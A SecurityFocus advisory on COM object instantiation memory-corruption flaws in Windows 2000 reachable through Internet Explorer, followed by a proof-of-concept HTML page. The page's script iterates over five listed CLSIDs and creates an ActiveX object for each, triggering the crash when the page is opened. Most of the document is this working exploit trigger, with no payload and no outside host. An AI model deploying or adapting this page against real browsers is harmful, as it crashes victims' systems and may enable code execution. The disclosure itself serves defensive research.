source: https://www.securityfocus.com/bid/19636/info

Microsoft Windows 2000 is prone to multiple memory-corruption vulnerabilities that are related to the instantiation of COM objects. These issues may be remotely triggered through Internet Explorer.

The vulnerabilities arise because of the way Internet Explorer tries to instantiate certain COM objects as ActiveX controls. This may result in arbitrary code execution, but this has not been confirmed. The affected objects are not likely intended to be instantiated through Internet Explorer.

This BID may be related to the issues discussed in BID 17453 (Microsoft Internet Explorer COM Object Instantiation Code Execution Vulnerability). However, these issues affect a different set of COM objects that were not addressed in previous BIDs.

<!-- // Windows 2000 Multiple COM Object Instantiation Vulnerability // tested on Windows 2000 SP4 CN // http://www.xsec.org // nop (nop#xsec.org) --> <html> <head> <title>COM-tester</title> </head> </body> <script> var i =0; var clsid = new Array( // NO: 1 // CLSID: {3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D} // Info: Microsoft Index Server Catalog Administration Object // ProgID: Microsoft.ISCatAdm.1 // InprocServer32: C:\WINNT\system32\ciodm.dll "{3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}", // NO: 2 // CLSID: {4682C82A-B2FF-11D0-95A8-00A0C92B77A9} // Info: MyInfo ASP Component// ProgID: MSWC.MyInfo.1 // InprocServer32: C:\WINNT\system32\inetsrv\MyInfo.dll "{4682C82A-B2FF-11D0-95A8-00A0C92B77A9}", // NO: 3 // CLSID: {8E71888A-423F-11D2-876E-00A0C9082467} // Info: RadioServer Class // ProgID: Mmedia.RadioServer.1 // InprocServer32: C:\WINNT\system32\msdxm.ocx "{8E71888A-423F-11D2-876E-00A0C9082467}", // NO: 4 media player? // CLSID: {606EF130-9852-11D3-97C6-0060084856D4} // Info: CdCreator Class// ProgID: Creator.CdCreator.1 // InprocServer32: C:\Program Files\Common Files\Adaptec Shared\CreatorAPI\creator.dll "{606EF130-9852-11D3-97C6-0060084856D4}", // NO: 5 media player? // CLSID: {F849164D-9863-11D3-97C6-0060084856D4} // Info: CdDevice Class// ProgID: Creator.CdDevice.1 // InprocServer32: C:\Program Files\Common Files\Adaptec Shared\CreatorAPI\creator.dll "{F849164D-9863-11D3-97C6-0060084856D4}", // END null ); while(clsid[i]) { var a = document.createElement("object"); window.status = "Testing Object " + clsid[i] + "..."; a.setAttribute("classid", "clsid:" + clsid[i]); i++; } window.status = "failed!"; </script> </body> </html>